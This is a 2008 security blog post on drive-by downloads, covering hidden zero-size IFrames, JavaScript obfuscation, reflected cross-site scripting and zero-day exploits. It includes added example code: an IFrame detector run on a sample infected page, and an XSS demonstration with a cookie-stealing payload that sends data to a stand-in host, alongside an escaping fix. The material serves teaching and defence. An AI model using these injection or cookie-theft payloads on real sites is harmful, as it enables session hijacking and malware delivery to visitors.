
The hidden part of the web

March 31st, 2008

The Internet has many facets which are difficult to summarize quickly, but for the most part people associate it with email, online shopping, blogs, multi-player games and so on.

All those activities are brought to us by a web browser, which renders the code used to build each web page. We rarely get to look at what is behind a page. Whether a site uses Java, Flash or is just a plain HTML document doesn't really matter to us; what we care about is that it looks good and is easy to navigate.
Sometimes an apparently legitimate site will trigger an explosion of pop-ups or bring our computer to a crawl for no apparent reason. The problem is that we didn't see what happened, because it was done behind our backs.

In this paper we will go deep into the core of a web page and expose the dangerous code responsible for infecting PCs.
A common expression used by security researchers is 'drive-by download'. In a nutshell, it means that a download happens without the user's knowledge. Another popular notion is 'exploit': a piece of code or sequence of commands that takes advantage of a bug or vulnerability in an application or operating system with the intent of gaining control of the machine.
Although a drive-by download is usually triggered by the user's own actions (visiting a page, clicking a link), it is neither wanted nor knowingly consented to. The actions that follow a drive-by download can also be carried out silently and stealthily, so that the user never becomes aware of them.

We will focus on browsing the web as the main vector for drive-by downloads. As mentioned earlier, web pages consist of lines of code that are interpreted by the web browser (Internet Explorer, Firefox). Most of the time the code is entirely legitimate: it makes the page more user friendly and adds functionality. For example, some code will determine which browser the user has, what the screen resolution is, and so on. Web pages therefore run code not only on the server side but also locally, on the client side, which is the user's PC. That is exactly what an attacker relies on: whatever the page instructs the browser to do is carried out on the visitor's machine.

IFrames
An IFrame is an HTML element that makes it possible to embed one HTML document within another. IFrames are often used to insert ads within a web page; put simply, they are to a web page what Picture-in-Picture is to a TV. The dimensions of the IFrame can be set manually, which is an important point: hackers use IFrames to embed a malicious web site inside a legitimate one.
Because they do not want the users, and even less the webmaster, to notice, they usually set both width and height to 0. The embedded page is still fetched and rendered by the browser, so any exploit it carries runs even though nothing is visible on screen.


Figure 1: Two IFrames are inserted into the source code of the webpage.

JavaScript Obfuscation
Although IFrames are already hard to spot, malware authors also want to make sure their code is not detected by search engines and other security tools. One way of doing this is to write the piece of code that inserts the IFrame and obfuscate it so that it is not easily readable: for instance, the HTML is stored as a percent-escaped or character-code-encoded string and only decoded (with unescape() or String.fromCharCode()) at the moment it is written into the page.
Many webmasters legitimately use the same kind of JavaScript obfuscation to protect the copyright of their site's source code, so obfuscation alone is not proof of malice.
Unfortunately, the browser decodes and executes the code regardless of its intent.


Figure 2: Obfuscated Javascript hides a malicious URL
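The following is an added example, not code from the original post or from ParetoLogic: it does statically what an analyst does by hand with pages like the ones in Figures 1 and 2. It decodes the two obfuscation idioms just described (unescape() of a percent-escaped string and String.fromCharCode() of a list of codes) without ever executing the script, then scans both the literal HTML and the decoded output for IFrames that are hidden by zero size, display:none, visibility:hidden or off-screen positioning. The sample page and the host names in it (ads.example, evil.example, bad.example, x.example) are constructed for the example.

```javascript
// Added example (not code from the original post): statically decode the two
// obfuscation idioms common on drive-by pages, unescape("%3C...") and
// String.fromCharCode(60,...), then scan the result for hidden IFrames.
// Nothing is eval()ed. Hosts in the sample page below are constructed.

// Decode percent-encoded (%XX and %uXXXX) text the way unescape() would.
function percentDecode(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (_, u, b) =>
    String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// Return every string a script would produce via unescape() or
// String.fromCharCode(), without running the script.
function decodeObfuscated(script) {
  const out = [];
  let m;
  const unescapeRe = /unescape\(\s*(["'])([^"']*)\1\s*\)/g;
  while ((m = unescapeRe.exec(script)) !== null) out.push(percentDecode(m[2]));
  const charCodeRe = /String\.fromCharCode\(([\d\s,]+)\)/g;
  while ((m = charCodeRe.exec(script)) !== null) {
    const codes = m[1].split(',').map(n => parseInt(n, 10)).filter(n => !isNaN(n));
    out.push(String.fromCharCode(...codes));
  }
  return out;
}

// Parse 'src="x" width=0 style=...' into an attribute map (keys lower-cased).
function parseAttrs(text) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(text)) !== null) attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  return attrs;
}

// Why an IFrame would be invisible to the user: zero size, display:none,
// visibility:hidden or pushed far off-screen.
function hiddenReasons(attrs) {
  const reasons = [];
  const tiny = v => v !== undefined && parseFloat(v) <= 1;      // "0", "0px", "1"
  if (tiny(attrs.width) || tiny(attrs.height)) reasons.push('zero-size attribute');
  const style = (attrs.style || '').toLowerCase().replace(/\s+/g, '');
  if (/display:none/.test(style)) reasons.push('display:none');
  if (/visibility:hidden/.test(style)) reasons.push('visibility:hidden');
  if (/(width|height):0(px)?(;|$)/.test(style)) reasons.push('zero-size style');
  if (/(left|top):-\d{3,}/.test(style)) reasons.push('positioned off-screen');
  return reasons;
}

// Find <iframe ...> tags (a regex is enough for this heuristic; a '>' inside
// an attribute value would cut the match short) and keep the hidden ones.
function findHiddenIframes(html, viaObfuscation) {
  const hits = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = parseAttrs(m[1]);
    const reasons = hiddenReasons(attrs);
    if (reasons.length) hits.push({ src: attrs.src || '', reasons, viaObfuscation });
  }
  return hits;
}

// Scan the literal HTML first, then whatever each <script> block decodes to.
function scanPage(html) {
  const hits = findHiddenIframes(html, false);
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    for (const decoded of decodeObfuscated(m[1])) hits.push(...findHiddenIframes(decoded, true));
  }
  return hits;
}

// Constructed sample page: a visible ad IFrame, a zero-size IFrame in the clear,
// and two hidden IFrames that only exist after the scripts are decoded.
const SAMPLE_HTML = `<html><body>
<iframe src="http://ads.example/banner" width="300" height="250"></iframe>
<iframe src="http://evil.example/in.cgi?3" width=0 height=0 frameborder=0></iframe>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fbad.example%2Fload.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E"));</script>
<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,120,46,101,120,97,109,112,108,101,47,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,34,62,60,47,105,102,114,97,109,101,62));</script>
</body></html>`;

for (const hit of scanPage(SAMPLE_HTML)) {
  console.log(`${hit.viaObfuscation ? 'obfuscated' : 'plain     '} ${hit.src}  (${hit.reasons.join(', ')})`);
}
```

Run with node; the visible 300x250 ad is not reported, the zero-size IFrame is reported as found in the clear, and the two IFrames inside unescape() and String.fromCharCode() are reported as found only after decoding. The decoding is deliberately pattern-based rather than eval()-based: running attacker-supplied script in the analysis tool is exactly the mistake the page warns the browser makes, and a static decoder also copes with the copyright-protection obfuscation mentioned above without having to decide in advance whether a given script is malicious.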

Other JavaScript malicious code
JavaScript enables a malware author to run malicious code on the victim's computer. One example of this security problem is called cross-site scripting (XSS). It happens when an attacker can force a legitimate site to include a malicious script in the page presented to the current victim, typically by placing the script in a link or form value that the site echoes back into its page without encoding it. (Note that the same legitimate web site accessed by a different person on another computer is still clean, which is different from a permanent IFrame infection that affects everyone accessing the site.)

For example, if a user logs into his online banking web site and at the same time opens up another web page, that second page can steer the browser to the bank's vulnerable page with a malicious script attached. Because the script is then served as part of the banking site itself, it runs with the user's session and can act on his behalf. The browser's same-origin policy normally keeps one site's script away from another site's content; XSS is dangerous precisely because it makes the malicious script appear to come from the bank.


Figure 3: poorly written malicious JavaScript
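As an added example (not code from the original post, and not the script shown in Figure 3), here is the reflected cross-site scripting flaw described above next to its hardened form. The welcome page, the parameter name and the hosts bank.example and evil.example are hypothetical; the two attack links are constructed to show what the bank's server would send back to the victim.

```javascript
// Added example (not code from the original post): a reflected cross-site
// scripting flaw of the kind described above, next to the hardened version.
// "bank.example", "evil.example" and the welcome page are hypothetical.

// Vulnerable server-side rendering: the "name" query parameter is pasted
// straight into the HTML, so markup in the parameter becomes part of the page.
function renderWelcomeVulnerable(requestUrl) {
  const name = new URL(requestUrl).searchParams.get('name') || 'guest';
  return `<p>Welcome back, ${name}!</p>`;
}

// Hardened: HTML-encode the characters that can change context before they
// are interpolated into element content.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

function renderWelcomeSafe(requestUrl) {
  const name = new URL(requestUrl).searchParams.get('name') || 'guest';
  return `<p>Welcome back, ${escapeHtml(name)}!</p>`;
}

// Crude "would this HTML run script?" check: a <script> tag, or an on* event
// handler attribute inside a real tag. Encoded text (&lt;img ...) never
// forms a tag, so it is correctly ignored.
function containsActiveScript(html) {
  return /<script\b|<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// Constructed attack link, as a malicious page or a phishing mail would send
// the victim to. Once the bank reflects it, the script runs *as bank.example*
// and can read document.cookie for that origin; the same-origin policy does
// not help because the browser believes the script came from the bank.
const PAYLOAD = '<script>new Image().src="http://evil.example/c?"+document.cookie</script>';
const ATTACK_URL = 'http://bank.example/welcome?name=' + encodeURIComponent(PAYLOAD);

// A second payload that never uses <script>: an event handler on a broken image.
const PAYLOAD2 = '<img src=x onerror="alert(document.cookie)">';
const ATTACK_URL2 = 'http://bank.example/welcome?name=' + encodeURIComponent(PAYLOAD2);

console.log('vulnerable:', renderWelcomeVulnerable(ATTACK_URL));
console.log('hardened:  ', renderWelcomeSafe(ATTACK_URL));
```

The fix is on the bank's side, not the user's: encoding the reflected value for the HTML context it is written into is what stops the injected markup from becoming part of the page. Encoding is context-specific; the escapeHtml() above is correct for element content and quoted attribute values, and a value written into a URL or directly into script code needs different treatment.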

Pure exploits
Exploits are code that takes advantage of software vulnerabilities. As alarming as that sounds, there are many known vulnerabilities still unpatched by Microsoft or other software companies. Blackhat hackers are constantly looking for new bugs in common software and operating systems. Some exploits are released in the wild (out there on the Internet) before anybody has a fix for them; these are called 'zero-day exploits'.
Although we can patch our PCs against the older exploits, we remain vulnerable to the zero-day ones until a fix is published and installed.
Vulnerability classes targeted by such exploits include memory corruption (buffer overflows and the like), SQL injection and other kinds of code injection.


Figure 4: a malicious DLL file caused an exception in Internet Explorer 7

As we saw, malware authors use all sorts of techniques to distribute their malicious code, and it is not always in their interest to make it visible to the user. Credit card or password stealing Trojans, for example, rely on staying stealthy and undetected.
There are many hot debates on which browser is the most secure; after all, the browser is your gateway to the Internet. There is, however, a general consensus that Internet Explorer is one of the least safe browsers: because it is the default browser on Windows machines, it is heavily targeted by hackers. But vulnerabilities are not unique to Microsoft products and concern everybody. Firefox, often praised as the most secure browser, has had its share of them and is patched regularly.

This is just a reminder that the online safety battle is far from being over.

Jerome Segura

This entry was posted on Monday, March 31st, 2008 at 8:54 am and is filed under Exploits.


© 2008 ParetoLogic Inc.